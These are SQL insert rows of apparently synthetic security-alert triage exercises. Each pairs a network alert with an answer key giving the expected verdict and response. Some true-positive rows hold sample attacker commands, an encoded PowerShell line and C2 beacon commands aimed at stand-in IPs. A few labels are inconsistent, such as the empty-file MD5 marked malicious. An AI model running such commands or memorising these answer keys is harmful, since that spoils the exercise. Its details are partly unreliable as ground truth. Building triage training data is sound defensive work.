(1923, 'Routine Vulnerability Scan Detected', 'low', 'Zeek', 'A network scan from an internal IP was detected, resembling a vulnerability assessment.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"IT-Scanner-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal IT department responsible for routine scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The scan was conducted by an internal tool for routine vulnerability assessments.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1924, 'Authorized Administrative Backup Activity', 'low', 'Suricata', 'Detected high-volume data transfer from internal server to backup server, typical of scheduled backup tasks.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"username\":\"backup_admin\",\"hostname\":\"Backup-Server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Regularly scheduled backup operation to authorized backup server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity aligns with the scheduled backup tasks performed by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1925, 'Misconfigured Legacy Application Traffic', 'medium', 'Corelight', 'Anomalous traffic patterns observed from a legacy application server due to a configuration error.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.12\",\"dst_ip\":\"192.168.3.25\",\"username\":\"legacy_user\",\"hostname\":\"Legacy-App-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Legacy system misconfiguration leading to unusual traffic patterns.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic pattern is due to a known issue with a legacy application configuration error.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1926, 'Routine Health Check by Network Monitoring Tool', 'low', 'Darktrace', 'Network monitoring tool detected performing routine health checks across multiple internal subnets.', 'Lateral Movement', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"192.168.4.11\",\"username\":\"netmon\",\"hostname\":\"Monitoring-Tool-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Recognized network monitoring tool performing regular health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network activity is consistent with normal operations of a network health monitoring tool.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1927, 'Confirmed Malware C2 Beaconing Activity', 'critical', 'Wireshark', 'Detected traffic from an internal host to an external C2 server, indicating potential malware beaconing.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"203.0.113.200\",\"username\":\"compromised_user\",\"hostname\":\"Infected-Host-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal host exhibiting suspicious behavior.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The traffic pattern and destination IP confirm malicious C2 beaconing from the internal host.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1928, 'Routine IT Vulnerability Scan', 'low', 'Zeek', 'Detected network traffic resembling a potential reconnaissance scan. Internal vulnerability scanning tool was run by IT.', 'Reconnaissance', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"admin_scan\",\"hostname\":\"scan-tool.local\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by IT for scanning purposes\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common command for network scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"This alert was generated by an internal vulnerability scan conducted by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1929, 'Authorized Administrative Backup Traffic', 'low', 'Corelight', 'Network activity flagged as potential data exfiltration. Upon investigation, it was identified as routine backup operations.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.11\",\"username\":\"backup_admin\",\"hostname\":\"backup-server.local\",\"command_line\":\"rsync -avz /data/ 192.168.2.11:/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/ 192.168.2.11:/backup/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Known command for data backup using rsync\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert pertains to authorized backup operations and is not indicative of data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1930, 'Misconfigured Legacy Application Communication', 'medium', 'Suricata', 'Unusual network traffic was flagged as potential C2 beaconing. Analysis revealed it to be a misconfigured legacy application.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.5\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server.local\",\"command_line\":\"legacy_app --connect 203.0.113.5\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for non-malicious traffic\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"legacy_app --connect 203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used by legacy application for communication\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The legacy application was misconfigured, resulting in network traffic that mimicked C2 beaconing.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1931, 'Benign System Health Check Traffic', 'low', 'Darktrace', 'Network connection detected that appeared as lateral movement. Identified as benign system health checks.', 'Lateral Movement', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"192.168.5.30\",\"username\":\"health_check\",\"hostname\":\"monitor-server.local\",\"command_line\":\"ping -c 4 192.168.5.30\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 4 192.168.5.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard ping command for system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was a part of routine system health checks and did not constitute lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1932, 'Suspicious Command Execution Detected on Endpoint', 'high', 'Wireshark', 'Potential malicious command execution detected involving an unauthorized script execution on an endpoint.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.50.10\",\"username\":\"compromised_user\",\"hostname\":\"compromised-machine.local\",\"command_line\":\"powershell.exe -EncodedCommand aABpACAAJwB3AG8AcgBsAGQAJwA=\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aABpACAAJwB3AG8AcgBsAGQAJwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of unauthorized execution\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"This alert represents a true positive as the PowerShell command was executed without authorization, indicating potential compromise.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1933, 'Routine IT Vulnerability Scanning Detected', 'low', 'Wireshark', 'A network scan was detected from an internal IP address, which appears to be part of authorized IT routine maintenance.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"itadmin\",\"hostname\":\"IT-SERVER01\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal network used by IT department\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network scanning command by IT\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it matches the profile of authorized IT scanning activity.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1934, 'Authorized Administrative Backup Activity', 'medium', 'Corelight', 'A data transfer from a critical server was detected. The activity matches scheduled backup operations.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"backupadmin\",\"hostname\":\"BACKUP-SERVER\",\"command_line\":\"rsync -avz /data 10.0.0.5:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal server used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data 10.0.0.5:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized data backup\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive because the data transfer aligns with scheduled backup activities.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1935, 'Benign System Health Check Detected', 'low', 'Zeek', 'An internal IP address executed health check scripts on several network devices. This activity is part of regular system maintenance.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"192.168.3.30\",\"username\":\"syshealth\",\"hostname\":\"HEALTH-CHECKER\",\"command_line\":\"healthcheck --device 192.168.3.30 --report\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for system health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"healthcheck --device 192.168.3.30 --report\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized health check\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This alert is a false positive as it corresponds to routine health checks performed by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1936, 'Misconfigured Legacy Application Traffic', 'medium', 'Suricata', 'Unusual network activity from a legacy application server was detected. The traffic pattern aligns with known misconfigurations causing false alarms.', 'Data Exfil', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.40\",\"dst_ip\":\"198.51.100.10\",\"username\":\"legacyapp\",\"hostname\":\"LEGACY-SERVER\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious activity reported\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is a false positive due to known misconfigurations in legacy applications causing benign network traffic.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1937, 'Suspicious C2 Beaconing Detected', 'high', 'Darktrace', 'A device on the internal network is communicating with a known Command and Control server. The communication pattern matches known malware behavior.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"203.0.113.45\",\"username\":\"infecteduser\",\"hostname\":\"INFECTED-PC\",\"command_line\":\"malicious.exe --connect 203.0.113.45\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address showing signs of infection\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious.exe --connect 203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Executable associated with multiple malware families\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive, as the communication pattern and IP address match known malicious activity linked to C2 servers.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1938, 'Routine IT Vulnerability Scan Triggered Network Communication Alert', 'medium', 'Zeek', 'A network communication from an internal IP was detected communicating with multiple external IPs over various ports. This is consistent with routine vulnerability scanning by IT.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.12\",\"username\":\"it_admin\",\"hostname\":\"internal-scanner\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address used for scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This activity matches known patterns of authorized vulnerability scanning, hence a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1939, 'Misconfigured Legacy App Generated Suspicious Network Traffic', 'low', 'Corelight', 'A misconfigured legacy application on an internal server generated suspicious traffic patterns typical of C2 communication. Investigation revealed it was benign.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"203.0.113.5\",\"username\":\"app_service\",\"hostname\":\"legacy-app-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with a known legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The misconfigured app resulted in unusual traffic but was not malicious.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1940, 'Authorized Administrative Backup Detected as Data Exfiltration', 'medium', 'Darktrace', 'Data transfer activity from a backup server to an external storage was flagged as potential data exfiltration. Verified as a scheduled backup task.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"198.51.100.50\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"External storage IP, no malicious activity detected.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Activity confirmed as legitimate due to scheduled backup tasks.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1941, 'Benign System Health Check Mistaken for Lateral Movement', 'low', 'Wireshark', 'Regular system health checks from a monitoring server were flagged as suspicious lateral movement within the network.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.200\",\"dst_ip\":\"192.168.1.201\",\"username\":\"monitor_service\",\"hostname\":\"monitor-server\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal monitoring server IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.201\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal server receiving health check.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Confirmed as benign system health checks from internal monitoring.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1942, 'Actual C2 Beaconing Detected from Compromised Internal Host', 'high', 'Suricata', 'Detected suspicious repeated connections from an internal host to a known malicious C2 server. Further investigation confirmed the host was compromised.', 'C2 Beaconing', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.99\",\"username\":\"user123\",\"hostname\":\"compromised-host\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 server activity.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection pattern and OSINT results confirm this as a true positive for C2 beaconing.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1943, 'Detected C2 Beaconing from Internal Host to External IP', 'critical', 'Darktrace', 'An internal host has been detected communicating with a known C2 server. The traffic pattern is consistent with beaconing activity.', 'C2 Communication', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:23:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.45\",\"hostname\":\"internal-pc-01\",\"command_line\":\"beacon.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"beacon.exe -connect 203.0.113.45:443\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command pattern matches known C2 beaconing\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP is linked to a known C2 server, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1944, 'Routine IT Vulnerability Scan Detected as Malicious', 'medium', 'Zeek', 'A routine internal vulnerability scan was flagged as suspicious network activity due to high traffic volume.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.25\",\"username\":\"admin_scan\",\"hostname\":\"scanner-host\",\"command_line\":\"nmap -sS 10.0.2.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal vulnerability scanner\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 10.0.2.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command matches routine network scan pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was confirmed to be a scheduled vulnerability scan by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
